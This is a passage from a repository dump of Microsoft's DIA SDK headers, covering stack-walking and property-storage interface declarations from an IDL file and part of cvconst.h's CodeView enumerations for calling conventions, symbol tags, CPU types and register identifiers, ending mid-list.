uuid(91904831-49ca-4766-b95c-25397e2dd6dc),
helpstring("Local Heap DiaSource Class")
]
coclass DiaSourceAlt
{
[default] interface IDiaDataSource;
};
// General stack walking API
[
uuid(ce4a85db-5768-475b-a4e1-c0bca2112a6b),
helpstring("General Stackwalk Class")
]
coclass DiaStackWalker
{
[default] interface IDiaStackWalker;
};
interface IDiaSectionContrib;
interface IDiaEnumSectionContribs;
interface IDiaSymbol10;
interface IDiaEnumSymbolsByAddr2;
};
//
// DebugInfoTable
//
// Each id identifies an underlying table of debug information
//
const LPOLESTR DiaTable_Symbols = L"Symbols";
const LPOLESTR DiaTable_Sections = L"Sections";
const LPOLESTR DiaTable_SrcFiles = L"SourceFiles";
const LPOLESTR DiaTable_LineNums = L"LineNumbers";
const LPOLESTR DiaTable_SegMap = L"SegmentMap";
const LPOLESTR DiaTable_Dbg = L"Dbg";
const LPOLESTR DiaTable_InjSrc = L"InjectedSource";
const LPOLESTR DiaTable_FrameData = L"FrameData";
const LPOLESTR DiaTable_InputAssemblyFiles = L"InputAssemblyFiles";
// Generic property broweser interface.
[
object,
uuid(9d416f9c-e184-45b2-a4f0-ce517f719e9b),
local,
helpstring("IDiaPropertyStorage Interface"),
pointer_default(unique)
]
interface IDiaPropertyStorage: IUnknown
{
HRESULT ReadMultiple(
[in] ULONG cpspec, // Count of properties being read
[in, size_is(cpspec)] PROPSPEC const *rgpspec, // Array of the properties to be read
[out, size_is(cpspec)]PROPVARIANT *rgvar // Array of PVARIANTs containing
// the property values on return
);
HRESULT ReadPropertyNames(
[in] ULONG cpropid, // Number of elements in rgpropid
[in, size_is( cpropid )] PROPID const *rgpropid, // Property identifiers for
// which names are to be retrieved
[in,out, size_is( cpropid )] BSTR *rglpwstrName // Array of returned string names
);
HRESULT Enum(
[out] IEnumSTATPROPSTG **ppenum //Pointer to output variable
// that receives the IEnumPROPSPEC
// interface pointer
);
HRESULT ReadDWORD(
[in] PROPID id, // property to be read
[out] DWORD* pValue // the property value on return
);
HRESULT ReadLONG(
[in] PROPID id, // property to be read
[out] LONG* pValue // the property value on return
);
HRESULT ReadBOOL(
[in] PROPID id, // property to be read
[out] BOOL* pValue // the property value on return
);
HRESULT ReadULONGLONG(
[in] PROPID id, // property to be read
[out] ULONGLONG* pValue // the property value on return
);
HRESULT ReadBSTR(
[in] PROPID id, // property to be read
[out] BSTR* pValue // the property value on return
);
}
[
object,
uuid(5edbc96d-cdd6-4792-afbe-cc89007d9610),
local,
helpstring("IDiaStackFrame Interface"),
pointer_default(unique)
]
interface IDiaStackFrame: IUnknown
{
PROPERTY_RO( DWORD, type, 1, "type" );
PROPERTY_RO( ULONGLONG, base, 2, "Base of the stack frame" );
PROPERTY_RO( DWORD, size, 3, "size of frame in bytes" );
PROPERTY_RO( ULONGLONG, returnAddress, 4, "return address of the frame" );
PROPERTY_RO( ULONGLONG, localsBase, 5, "base of locals" );
PROPERTY_RO( DWORD, lengthLocals, 6, "cbLocals" );
PROPERTY_RO( DWORD, lengthParams, 7, "cbParams" );
PROPERTY_RO( DWORD, lengthProlog, 8, "cbProlog" );
PROPERTY_RO( DWORD, lengthSavedRegisters, 9, "cbSavedRegs" );
PROPERTY_RO( BOOL, systemExceptionHandling, 10, "fHasSEH" );
PROPERTY_RO( BOOL, cplusplusExceptionHandling, 11, "fHasEH" );
PROPERTY_RO( BOOL, functionStart, 12, "funcStart" );
PROPERTY_RO( BOOL, allocatesBasePointer, 13, "fUsesBP" );
PROPERTY_RO( DWORD, maxStack, 14, "maxStack" );
PROPERTY_ARRAY_RO( ULONGLONG, DWORD, registerValue, 15, "Register value." );
}
[
object,
uuid(ec9d461d-ce74-4711-a020-7d8f9a1dd255),
local,
helpstring("IDiaEnumStackFrames Interface"),
pointer_default(unique)
]
interface IDiaEnumStackFrames: IUnknown
{
HRESULT Next(
[in] ULONG celt,
[out] IDiaStackFrame ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Reset();
}
typedef struct {
DWORD ulOffStart; // offset 1st byte of function code
DWORD cbProcSize; // # bytes in function
DWORD cdwLocals; // # bytes in locals/4
WORD cdwParams; // # bytes in params/4
WORD cdwFlags; // Following stuff ...
/*
WORD cbProlog : 8; // # bytes in prolog
WORD cbRegs : 3; // # regs saved
WORD fHasSEH : 1; // TRUE if SEH in func
WORD fUseBP : 1; // TRUE if EBP has been allocated
WORD reserved : 1; // reserved for future use
WORD cbFrame : 2; // frame type
*/
} FPODATA;
[
object,
uuid(21F81B1B-C5BB-42A3-BC4F-CCBAA75B9F19),
local,
helpstring("IDiaStackWalkHelper Interface"),
pointer_default(unique)
]
interface IDiaStackWalkHelper: IUnknown
{
PROPERTY_ARRAY_RW( ULONGLONG, DWORD, registerValue, 1, "Register value." );
HRESULT readMemory( // Read memory for DIA
[in] enum MemoryTypeEnum type,
[in] ULONGLONG va,
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData
);
HRESULT searchForReturnAddress( // search return address for DIA, return E_NOTIMPL to use DIA default
[in] IDiaFrameData* frame,
[out] ULONGLONG* returnAddress
);
HRESULT searchForReturnAddressStart( // search return address for DIA, return E_NOTIMPL to use DIA default
[in] IDiaFrameData* frame,
[in] ULONGLONG startAddress,
[out] ULONGLONG* returnAddress
);
HRESULT frameForVA( // Get frame data for this address
[in] ULONGLONG va,
[out] IDiaFrameData **ppFrame
);
HRESULT symbolForVA( // Get symbol at this address, must be a SymTagFunctionType!
[in] ULONGLONG va,
[out] IDiaSymbol **ppSymbol
);
HRESULT pdataForVA( // Get PDATA for this address
[in] ULONGLONG va,
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData
);
HRESULT imageForVA( // Get information about an image
[in] ULONGLONG vaContext, // An address in the image
[out] ULONGLONG *pvaImageStart // Beginning of the image
);
HRESULT addressForVA(
[in] ULONGLONG va,
[out] DWORD* pISect,
[out] DWORD* pOffset
);
HRESULT numberOfFunctionFragmentsForVA(
[in] ULONGLONG vaFunc,
[in] DWORD cbFunc,
[out] DWORD* pNumFragments
);
HRESULT functionFragmentsForVA(
[in] ULONGLONG vaFunc,
[in] DWORD cbFunc,
[in] DWORD cFragments,
[out] ULONGLONG *pVaFragment,
[out] DWORD *pLenFragment
);
}
[
object,
uuid(5485216b-a54c-469f-9670-52b24d5229bb),
local,
helpstring("IDiaStackWalker Interface"),
pointer_default(unique)
]
interface IDiaStackWalker: IUnknown
{
HRESULT getEnumFrames( // Gives you frame enumerator for x86
[in] IDiaStackWalkHelper *pHelper,
[out] IDiaEnumStackFrames **ppEnum
);
HRESULT getEnumFrames2( // Gives frame enumerator for processor specified by dwMachineId
[in] enum CV_CPU_TYPE_e cpuid,
[in] IDiaStackWalkHelper *pHelper,
[out] IDiaEnumStackFrames **ppEnum
);
}
[
object,
uuid(8222c490-507b-4bef-b3bd-41dca7b5934c),
local,
helpstring("IDiaStackWalkHelper Interface"),
pointer_default(unique)
]
interface IDiaStackWalkHelper2 : IDiaStackWalkHelper
{
}
[
object,
uuid(7c185885-a015-4cac-9411-0f4fb39b1f3a),
local,
helpstring("IDiaStackWalker2 Interface"),
pointer_default(unique)
]
interface IDiaStackWalker2 : IDiaStackWalker
{
}
================================================
FILE: DIA/inc/msdia/include/cvconst.h
================================================
// cvconst.h - codeview constant definitions
//-----------------------------------------------------------------
//
// Copyright Microsoft Corporation. All Rights Reserved.
//
//---------------------------------------------------------------
#ifndef _CVCONST_H_
#define _CVCONST_H_
// Enumeration for function call type
typedef enum CV_call_e
{
CV_CALL_NEAR_C = 0x00, // near right to left push, caller pops stack
CV_CALL_FAR_C = 0x01, // far right to left push, caller pops stack
CV_CALL_NEAR_PASCAL = 0x02, // near left to right push, callee pops stack
CV_CALL_FAR_PASCAL = 0x03, // far left to right push, callee pops stack
CV_CALL_NEAR_FAST = 0x04, // near left to right push with regs, callee pops stack
CV_CALL_FAR_FAST = 0x05, // far left to right push with regs, callee pops stack
CV_CALL_SKIPPED = 0x06, // skipped (unused) call index
CV_CALL_NEAR_STD = 0x07, // near standard call
CV_CALL_FAR_STD = 0x08, // far standard call
CV_CALL_NEAR_SYS = 0x09, // near sys call
CV_CALL_FAR_SYS = 0x0a, // far sys call
CV_CALL_THISCALL = 0x0b, // this call (this passed in register)
CV_CALL_MIPSCALL = 0x0c, // Mips call
CV_CALL_GENERIC = 0x0d, // Generic call sequence
CV_CALL_ALPHACALL = 0x0e, // Alpha call
CV_CALL_PPCCALL = 0x0f, // PPC call
CV_CALL_SHCALL = 0x10, // Hitachi SuperH call
CV_CALL_ARMCALL = 0x11, // ARM call
CV_CALL_AM33CALL = 0x12, // AM33 call
CV_CALL_TRICALL = 0x13, // TriCore Call
CV_CALL_SH5CALL = 0x14, // Hitachi SuperH-5 call
CV_CALL_M32RCALL = 0x15, // M32R Call
CV_CALL_CLRCALL = 0x16, // clr call
CV_CALL_INLINE = 0x17, // Marker for routines always inlined and thus lacking a convention
CV_CALL_NEAR_VECTOR = 0x18, // near left to right push with regs, callee pops stack
CV_CALL_SWIFT = 0x19, // Swift calling convention
CV_CALL_RESERVED = 0x20 // first unused call enumeration
// Do NOT add any more machine specific conventions. This is to be used for
// calling conventions in the source only (e.g. __cdecl, __stdcall).
} CV_call_e;
// Values for the access protection of class attributes
typedef enum CV_access_e
{
CV_private = 1,
CV_protected = 2,
CV_public = 3
} CV_access_e;
typedef enum THUNK_ORDINAL
{
THUNK_ORDINAL_NOTYPE, // standard thunk
THUNK_ORDINAL_ADJUSTOR, // "this" adjustor thunk
THUNK_ORDINAL_VCALL, // virtual call thunk
THUNK_ORDINAL_PCODE, // pcode thunk
THUNK_ORDINAL_LOAD, // thunk which loads the address to jump to
// via unknown means...
// trampoline thunk ordinals - only for use in Trampoline thunk symbols
THUNK_ORDINAL_TRAMP_INCREMENTAL,
THUNK_ORDINAL_TRAMP_BRANCHISLAND,
THUNK_ORDINAL_TRAMP_STRICTICF,
THUNK_ORDINAL_TRAMP_ARM64XSAMEADDRESS,
THUNK_ORDINAL_TRAMP_FUNCOVERRIDING,
} THUNK_ORDINAL;
enum CV_SourceChksum_t
{
CHKSUM_TYPE_NONE = 0, // indicates no checksum is available
CHKSUM_TYPE_MD5,
CHKSUM_TYPE_SHA1,
CHKSUM_TYPE_SHA_256,
};
//
// DIA enums
//
enum SymTagEnum
{
SymTagNull,
SymTagExe,
SymTagCompiland,
SymTagCompilandDetails,
SymTagCompilandEnv,
SymTagFunction,
SymTagBlock,
SymTagData,
SymTagAnnotation,
SymTagLabel,
SymTagPublicSymbol,
SymTagUDT,
SymTagEnum,
SymTagFunctionType,
SymTagPointerType,
SymTagArrayType,
SymTagBaseType,
SymTagTypedef,
SymTagBaseClass,
SymTagFriend,
SymTagFunctionArgType,
SymTagFuncDebugStart,
SymTagFuncDebugEnd,
SymTagUsingNamespace,
SymTagVTableShape,
SymTagVTable,
SymTagCustom,
SymTagThunk,
SymTagCustomType,
SymTagManagedType,
SymTagDimension,
SymTagCallSite,
SymTagInlineSite,
SymTagBaseInterface,
SymTagVectorType,
SymTagMatrixType,
SymTagHLSLType,
SymTagCaller,
SymTagCallee,
SymTagExport,
SymTagHeapAllocationSite,
SymTagCoffGroup,
SymTagInlinee,
SymTagMax
};
enum LocationType
{
LocIsNull,
LocIsStatic,
LocIsTLS,
LocIsRegRel,
LocIsThisRel,
LocIsEnregistered,
LocIsBitField,
LocIsSlot,
LocIsIlRel,
LocInMetaData,
LocIsConstant,
LocIsRegRelAliasIndir,
LocTypeMax
};
enum DataKind
{
DataIsUnknown,
DataIsLocal,
DataIsStaticLocal,
DataIsParam,
DataIsObjectPtr,
DataIsFileStatic,
DataIsGlobal,
DataIsMember,
DataIsStaticMember,
DataIsConstant
};
enum UdtKind
{
UdtStruct,
UdtClass,
UdtUnion,
UdtInterface
};
enum BasicType
{
btNoType = 0,
btVoid = 1,
btChar = 2,
btWChar = 3,
btInt = 6,
btUInt = 7,
btFloat = 8,
btBCD = 9,
btBool = 10,
btLong = 13,
btULong = 14,
btCurrency = 25,
btDate = 26,
btVariant = 27,
btComplex = 28,
btBit = 29,
btBSTR = 30,
btHresult = 31,
btChar16 = 32, // char16_t
btChar32 = 33, // char32_t
btChar8 = 34, // char8_t
};
// enumeration for type modifier values
typedef enum CV_modifier_e
{
// 0x0000 - 0x01ff - Reserved.
CV_MOD_INVALID = 0x0000,
// Standard modifiers.
CV_MOD_CONST = 0x0001,
CV_MOD_VOLATILE = 0x0002,
CV_MOD_UNALIGNED = 0x0003,
// 0x0200 - 0x03ff - HLSL modifiers.
CV_MOD_HLSL_UNIFORM = 0x0200,
CV_MOD_HLSL_LINE = 0x0201,
CV_MOD_HLSL_TRIANGLE = 0x0202,
CV_MOD_HLSL_LINEADJ = 0x0203,
CV_MOD_HLSL_TRIANGLEADJ = 0x0204,
CV_MOD_HLSL_LINEAR = 0x0205,
CV_MOD_HLSL_CENTROID = 0x0206,
CV_MOD_HLSL_CONSTINTERP = 0x0207,
CV_MOD_HLSL_NOPERSPECTIVE = 0x0208,
CV_MOD_HLSL_SAMPLE = 0x0209,
CV_MOD_HLSL_CENTER = 0x020a,
CV_MOD_HLSL_SNORM = 0x020b,
CV_MOD_HLSL_UNORM = 0x020c,
CV_MOD_HLSL_PRECISE = 0x020d,
CV_MOD_HLSL_UAV_GLOBALLY_COHERENT = 0x020e,
// 0x0400 - 0xffff - Unused.
} CV_modifier_e;
// built-in type kinds
typedef enum CV_builtin_e
{
// 0x0000 - 0x01ff - Reserved.
CV_BI_INVALID = 0x0000,
// 0x0200 - 0x03ff - HLSL types.
CV_BI_HLSL_INTERFACE_POINTER = 0x0200,
CV_BI_HLSL_TEXTURE1D = 0x0201,
CV_BI_HLSL_TEXTURE1D_ARRAY = 0x0202,
CV_BI_HLSL_TEXTURE2D = 0x0203,
CV_BI_HLSL_TEXTURE2D_ARRAY = 0x0204,
CV_BI_HLSL_TEXTURE3D = 0x0205,
CV_BI_HLSL_TEXTURECUBE = 0x0206,
CV_BI_HLSL_TEXTURECUBE_ARRAY = 0x0207,
CV_BI_HLSL_TEXTURE2DMS = 0x0208,
CV_BI_HLSL_TEXTURE2DMS_ARRAY = 0x0209,
CV_BI_HLSL_SAMPLER = 0x020a,
CV_BI_HLSL_SAMPLERCOMPARISON = 0x020b,
CV_BI_HLSL_BUFFER = 0x020c,
CV_BI_HLSL_POINTSTREAM = 0x020d,
CV_BI_HLSL_LINESTREAM = 0x020e,
CV_BI_HLSL_TRIANGLESTREAM = 0x020f,
CV_BI_HLSL_INPUTPATCH = 0x0210,
CV_BI_HLSL_OUTPUTPATCH = 0x0211,
CV_BI_HLSL_RWTEXTURE1D = 0x0212,
CV_BI_HLSL_RWTEXTURE1D_ARRAY = 0x0213,
CV_BI_HLSL_RWTEXTURE2D = 0x0214,
CV_BI_HLSL_RWTEXTURE2D_ARRAY = 0x0215,
CV_BI_HLSL_RWTEXTURE3D = 0x0216,
CV_BI_HLSL_RWBUFFER = 0x0217,
CV_BI_HLSL_BYTEADDRESS_BUFFER = 0x0218,
CV_BI_HLSL_RWBYTEADDRESS_BUFFER = 0x0219,
CV_BI_HLSL_STRUCTURED_BUFFER = 0x021a,
CV_BI_HLSL_RWSTRUCTURED_BUFFER = 0x021b,
CV_BI_HLSL_APPEND_STRUCTURED_BUFFER = 0x021c,
CV_BI_HLSL_CONSUME_STRUCTURED_BUFFER= 0x021d,
CV_BI_HLSL_MIN8FLOAT = 0x021e,
CV_BI_HLSL_MIN10FLOAT = 0x021f,
CV_BI_HLSL_MIN16FLOAT = 0x0220,
CV_BI_HLSL_MIN12INT = 0x0221,
CV_BI_HLSL_MIN16INT = 0x0222,
CV_BI_HLSL_MIN16UINT = 0x0223,
CV_BI_HLSL_CONSTANT_BUFFER = 0x0224,
// 0x0400 - 0xffff - Unused.
} CV_builtin_e;
// enum describing the compile flag source language
typedef enum CV_CFL_LANG
{
CV_CFL_C = 0x00,
CV_CFL_CXX = 0x01,
CV_CFL_FORTRAN = 0x02,
CV_CFL_MASM = 0x03,
CV_CFL_PASCAL = 0x04,
CV_CFL_BASIC = 0x05,
CV_CFL_COBOL = 0x06,
CV_CFL_LINK = 0x07,
CV_CFL_CVTRES = 0x08,
CV_CFL_CVTPGD = 0x09,
CV_CFL_CSHARP = 0x0A, // C#
CV_CFL_VB = 0x0B, // Visual Basic
CV_CFL_ILASM = 0x0C, // IL (as in CLR) ASM
CV_CFL_JAVA = 0x0D,
CV_CFL_JSCRIPT = 0x0E,
CV_CFL_MSIL = 0x0F, // Unknown MSIL (LTCG of .NETMODULE)
CV_CFL_HLSL = 0x10, // High Level Shader Language
CV_CFL_OBJC = 0x11, // Objective-C
CV_CFL_OBJCXX = 0x12, // Objective-C++
CV_CFL_SWIFT = 0x13, // Swift
CV_CFL_ALIASOBJ = 0x14,
CV_CFL_RUST = 0x15, // Rust
} CV_CFL_LANG;
// enum describing target processor
typedef enum CV_CPU_TYPE_e
{
CV_CFL_8080 = 0x00,
CV_CFL_8086 = 0x01,
CV_CFL_80286 = 0x02,
CV_CFL_80386 = 0x03,
CV_CFL_80486 = 0x04,
CV_CFL_PENTIUM = 0x05,
CV_CFL_PENTIUMII = 0x06,
CV_CFL_PENTIUMPRO = CV_CFL_PENTIUMII,
CV_CFL_PENTIUMIII = 0x07,
CV_CFL_MIPS = 0x10,
CV_CFL_MIPSR4000 = CV_CFL_MIPS, // don't break current code
CV_CFL_MIPS16 = 0x11,
CV_CFL_MIPS32 = 0x12,
CV_CFL_MIPS64 = 0x13,
CV_CFL_MIPSI = 0x14,
CV_CFL_MIPSII = 0x15,
CV_CFL_MIPSIII = 0x16,
CV_CFL_MIPSIV = 0x17,
CV_CFL_MIPSV = 0x18,
CV_CFL_M68000 = 0x20,
CV_CFL_M68010 = 0x21,
CV_CFL_M68020 = 0x22,
CV_CFL_M68030 = 0x23,
CV_CFL_M68040 = 0x24,
CV_CFL_ALPHA = 0x30,
CV_CFL_ALPHA_21064 = 0x30,
CV_CFL_ALPHA_21164 = 0x31,
CV_CFL_ALPHA_21164A = 0x32,
CV_CFL_ALPHA_21264 = 0x33,
CV_CFL_ALPHA_21364 = 0x34,
CV_CFL_PPC601 = 0x40,
CV_CFL_PPC603 = 0x41,
CV_CFL_PPC604 = 0x42,
CV_CFL_PPC620 = 0x43,
CV_CFL_PPCFP = 0x44,
CV_CFL_PPCBE = 0x45,
CV_CFL_SH3 = 0x50,
CV_CFL_SH3E = 0x51,
CV_CFL_SH3DSP = 0x52,
CV_CFL_SH4 = 0x53,
CV_CFL_SHMEDIA = 0x54,
CV_CFL_ARM3 = 0x60,
CV_CFL_ARM4 = 0x61,
CV_CFL_ARM4T = 0x62,
CV_CFL_ARM5 = 0x63,
CV_CFL_ARM5T = 0x64,
CV_CFL_ARM6 = 0x65,
CV_CFL_ARM_XMAC = 0x66,
CV_CFL_ARM_WMMX = 0x67,
CV_CFL_ARM7 = 0x68,
CV_CFL_OMNI = 0x70,
CV_CFL_IA64 = 0x80,
CV_CFL_IA64_1 = 0x80,
CV_CFL_IA64_2 = 0x81,
CV_CFL_CEE = 0x90,
CV_CFL_AM33 = 0xA0,
CV_CFL_M32R = 0xB0,
CV_CFL_TRICORE = 0xC0,
CV_CFL_X64 = 0xD0,
CV_CFL_AMD64 = CV_CFL_X64,
CV_CFL_EBC = 0xE0,
CV_CFL_THUMB = 0xF0,
CV_CFL_ARMNT = 0xF4,
CV_CFL_ARM64 = 0xF6,
CV_CFL_HYBRID_X86_ARM64 = 0xF7,
CV_CFL_ARM64EC = 0xF8,
CV_CFL_ARM64X = 0xF9,
CV_CFL_UNKNOWN = 0xFF,
CV_CFL_D3D11_SHADER = 0x100,
} CV_CPU_TYPE_e;
typedef enum CV_HREG_e
{
// Register subset shared by all processor types,
// must not overlap with any of the ranges below, hence the high values
CV_ALLREG_ERR = 30000,
CV_ALLREG_TEB = 30001,
CV_ALLREG_TIMER = 30002,
CV_ALLREG_EFAD1 = 30003,
CV_ALLREG_EFAD2 = 30004,
CV_ALLREG_EFAD3 = 30005,
CV_ALLREG_VFRAME= 30006,
CV_ALLREG_HANDLE= 30007,
CV_ALLREG_PARAMS= 30008,
CV_ALLREG_LOCALS= 30009,
CV_ALLREG_TID = 30010,
CV_ALLREG_ENV = 30011,
CV_ALLREG_CMDLN = 30012,
// Register set for the Intel 80x86 and ix86 processor series
// (plus PCODE registers)
CV_REG_NONE = 0,
CV_REG_AL = 1,
CV_REG_CL = 2,
CV_REG_DL = 3,
CV_REG_BL = 4,
CV_REG_AH = 5,
CV_REG_CH = 6,
CV_REG_DH = 7,
CV_REG_BH = 8,
CV_REG_AX = 9,
CV_REG_CX = 10,
CV_REG_DX = 11,
CV_REG_BX = 12,
CV_REG_SP = 13,
CV_REG_BP = 14,
CV_REG_SI = 15,
CV_REG_DI = 16,
CV_REG_EAX = 17,
CV_REG_ECX = 18,
CV_REG_EDX = 19,
CV_REG_EBX = 20,
CV_REG_ESP = 21,
CV_REG_EBP = 22,
CV_REG_ESI = 23,
CV_REG_EDI = 24,
CV_REG_ES = 25,
CV_REG_CS = 26,
CV_REG_SS = 27,
CV_REG_DS = 28,
CV_REG_FS = 29,
CV_REG_GS = 30,
CV_REG_IP = 31,
CV_REG_FLAGS = 32,
CV_REG_EIP = 33,
CV_REG_EFLAGS = 34,
CV_REG_TEMP = 40, // PCODE Temp
CV_REG_TEMPH = 41, // PCODE TempH
CV_REG_QUOTE = 42, // PCODE Quote
CV_REG_PCDR3 = 43, // PCODE reserved
CV_REG_PCDR4 = 44, // PCODE reserved
CV_REG_PCDR5 = 45, // PCODE reserved
CV_REG_PCDR6 = 46, // PCODE reserved
CV_REG_PCDR7 = 47, // PCODE reserved
CV_REG_CR0 = 80, // CR0 -- control registers
CV_REG_CR1 = 81,
CV_REG_CR2 = 82,
CV_REG_CR3 = 83,
CV_REG_CR4 = 84, // Pentium
CV_REG_DR0 = 90, // Debug register
CV_REG_DR1 = 91,
CV_REG_DR2 = 92,
CV_REG_DR3 = 93,
CV_REG_DR4 = 94,
CV_REG_DR5 = 95,
CV_REG_DR6 = 96,
CV_REG_DR7 = 97,
CV_REG_GDTR = 110,
CV_REG_GDTL = 111,
CV_REG_IDTR = 112,
CV_REG_IDTL = 113,
CV_REG_LDTR = 114,
CV_REG_TR = 115,
CV_REG_PSEUDO1 = 116,
CV_REG_PSEUDO2 = 117,
CV_REG_PSEUDO3 = 118,
CV_REG_PSEUDO4 = 119,
CV_REG_PSEUDO5 = 120,
CV_REG_PSEUDO6 = 121,
CV_REG_PSEUDO7 = 122,
CV_REG_PSEUDO8 = 123,
CV_REG_PSEUDO9 = 124,
CV_REG_ST0 = 128,
CV_REG_ST1 = 129,
CV_REG_ST2 = 130,
CV_REG_ST3 = 131,
CV_REG_ST4 = 132,
CV_REG_ST5 = 133,
CV_REG_ST6 = 134,
CV_REG_ST7 = 135,
CV_REG_CTRL = 136,
CV_REG_STAT = 137,
CV_REG_TAG = 138,
CV_REG_FPIP = 139,
CV_REG_FPCS = 140,
CV_REG_FPDO = 141,
CV_REG_FPDS = 142,
CV_REG_ISEM = 143,
CV_REG_FPEIP = 144,
CV_REG_FPEDO = 145,
CV_REG_MM0 = 146,
CV_REG_MM1 = 147,
CV_REG_MM2 = 148,
CV_REG_MM3 = 149,
CV_REG_MM4 = 150,
CV_REG_MM5 = 151,
CV_REG_MM6 = 152,
CV_REG_MM7 = 153,
CV_REG_XMM0 = 154, // KATMAI registers
CV_REG_XMM1 = 155,
CV_REG_XMM2 = 156,
CV_REG_XMM3 = 157,
CV_REG_XMM4 = 158,
CV_REG_XMM5 = 159,
CV_REG_XMM6 = 160,
CV_REG_XMM7 = 161,
CV_REG_XMM00 = 162, // KATMAI sub-registers
CV_REG_XMM01 = 163,
CV_REG_XMM02 = 164,
CV_REG_XMM03 = 165,
CV_REG_XMM10 = 166,
CV_REG_XMM11 = 167,
CV_REG_XMM12 = 168,
CV_REG_XMM13 = 169,
CV_REG_XMM20 = 170,
CV_REG_XMM21 = 171,
CV_REG_XMM22 = 172,
CV_REG_XMM23 = 173,
CV_REG_XMM30 = 174,
CV_REG_XMM31 = 175,
CV_REG_XMM32 = 176,
CV_REG_XMM33 = 177,
CV_REG_XMM40 = 178,
CV_REG_XMM41 = 179,
CV_REG_XMM42 = 180,
CV_REG_XMM43 = 181,
CV_REG_XMM50 = 182,
CV_REG_XMM51 = 183,
CV_REG_XMM52 = 184,
CV_REG_XMM53 = 185,
CV_REG_XMM60 = 186,
CV_REG_XMM61 = 187,
CV_REG_XMM62 = 188,
CV_REG_XMM63 = 189,
CV_REG_XMM70 = 190,
CV_REG_XMM71 = 191,
CV_REG_XMM72 = 192,
CV_REG_XMM73 = 193,
CV_REG_XMM0L = 194,
CV_REG_XMM1L = 195,
CV_REG_XMM2L = 196,
CV_REG_XMM3L = 197,
CV_REG_XMM4L = 198,
CV_REG_XMM5L = 199,
CV_REG_XMM6L = 200,
CV_REG_XMM7L = 201,
CV_REG_XMM0H = 202,
CV_REG_XMM1H = 203,
CV_REG_XMM2H = 204,
CV_REG_XMM3H = 205,
CV_REG_XMM4H = 206,
CV_REG_XMM5H = 207,
CV_REG_XMM6H = 208,
CV_REG_XMM7H = 209,
CV_REG_MXCSR = 211, // XMM status register
CV_REG_EDXEAX = 212, // EDX:EAX pair
CV_REG_EMM0L = 220, // XMM sub-registers (WNI integer)
CV_REG_EMM1L = 221,
CV_REG_EMM2L = 222,
CV_REG_EMM3L = 223,
CV_REG_EMM4L = 224,
CV_REG_EMM5L = 225,
CV_REG_EMM6L = 226,
CV_REG_EMM7L = 227,
CV_REG_EMM0H = 228,
CV_REG_EMM1H = 229,
CV_REG_EMM2H = 230,
CV_REG_EMM3H = 231,
CV_REG_EMM4H = 232,
CV_REG_EMM5H = 233,
CV_REG_EMM6H = 234,
CV_REG_EMM7H = 235,
// do not change the order of these regs, first one must be even too
CV_REG_MM00 = 236,
CV_REG_MM01 = 237,
CV_REG_MM10 = 238,
CV_REG_MM11 = 239,
CV_REG_MM20 = 240,
CV_REG_MM21 = 241,
CV_REG_MM30 = 242,
CV_REG_MM31 = 243,
CV_REG_MM40 = 244,
CV_REG_MM41 = 245,
CV_REG_MM50 = 246,
CV_REG_MM51 = 247,
CV_REG_MM60 = 248,
CV_REG_MM61 = 249,
CV_REG_MM70 = 250,
CV_REG_MM71 = 251,
CV_REG_YMM0 = 252, // AVX registers
CV_REG_YMM1 = 253,
CV_REG_YMM2 = 254,
CV_REG_YMM3 = 255,
CV_REG_YMM4 = 256,
CV_REG_YMM5 = 257,
CV_REG_YMM6 = 258,
CV_REG_YMM7 = 259,
CV_REG_YMM0H = 260,
CV_REG_YMM1H = 261,
CV_REG_YMM2H = 262,
CV_REG_YMM3H = 263,
CV_REG_YMM4H = 264,
CV_REG_YMM5H = 265,
CV_REG_YMM6H = 266,
CV_REG_YMM7H = 267,
CV_REG_YMM0I0 = 268, // AVX integer registers
CV_REG_YMM0I1 = 269,
CV_REG_YMM0I2 = 270,
CV_REG_YMM0I3 = 271,
CV_REG_YMM1I0 = 272,
CV_REG_YMM1I1 = 273,
CV_REG_YMM1I2 = 274,
CV_REG_YMM1I3 = 275,
CV_REG_YMM2I0 = 276,
CV_REG_YMM2I1 = 277,
CV_REG_YMM2I2 = 278,
CV_REG_YMM2I3 = 279,
CV_REG_YMM3I0 = 280,
CV_REG_YMM3I1 = 281,
CV_REG_YMM3I2 = 282,
CV_REG_YMM3I3 = 283,
CV_REG_YMM4I0 = 284,
CV_REG_YMM4I1 = 285,
CV_REG_YMM4I2 = 286,
CV_REG_YMM4I3 = 287,
CV_REG_YMM5I0 = 288,
CV_REG_YMM5I1 = 289,
CV_REG_YMM5I2 = 290,
CV_REG_YMM5I3 = 291,
CV_REG_YMM6I0 = 292,
CV_REG_YMM6I1 = 293,
CV_REG_YMM6I2 = 294,
CV_REG_YMM6I3 = 295,
CV_REG_YMM7I0 = 296,
CV_REG_YMM7I1 = 297,
CV_REG_YMM7I2 = 298,
CV_REG_YMM7I3 = 299,
CV_REG_YMM0F0 = 300, // AVX floating-point single precise registers
CV_REG_YMM0F1 = 301,
CV_REG_YMM0F2 = 302,
CV_REG_YMM0F3 = 303,
CV_REG_YMM0F4 = 304,
CV_REG_YMM0F5 = 305,
CV_REG_YMM0F6 = 306,
CV_REG_YMM0F7 = 307,
CV_REG_YMM1F0 = 308,
CV_REG_YMM1F1 = 309,
CV_REG_YMM1F2 = 310,
CV_REG_YMM1F3 = 311,
CV_REG_YMM1F4 = 312,
CV_REG_YMM1F5 = 313,
CV_REG_YMM1F6 = 314,
CV_REG_YMM1F7 = 315,
CV_REG_YMM2F0 = 316,
CV_REG_YMM2F1 = 317,
CV_REG_YMM2F2 = 318,
CV_REG_YMM2F3 = 319,
CV_REG_YMM2F4 = 320,
CV_REG_YMM2F5 = 321,
CV_REG_YMM2F6 = 322,
CV_REG_YMM2F7 = 323,
CV_REG_YMM3F0 = 324,
CV_REG_YMM3F1 = 325,
CV_REG_YMM3F2 = 326,
CV_REG_YMM3F3 = 327,
CV_REG_YMM3F4 = 328,
CV_REG_YMM3F5 = 329,
CV_REG_YMM3F6 = 330,
CV_REG_YMM3F7 = 331,
CV_REG_YMM4F0 = 332,
CV_REG_YMM4F1 = 333,
CV_REG_YMM4F2 = 334,
CV_REG_YMM4F3 = 335,
CV_REG_YMM4F4 = 336,
CV_REG_YMM4F5 = 337,
CV_REG_YMM4F6 = 338,
CV_REG_YMM4F7 = 339,
CV_REG_YMM5F0 = 340,
CV_REG_YMM5F1 = 341,
CV_REG_YMM5F2 = 342,
CV_REG_YMM5F3 = 343,
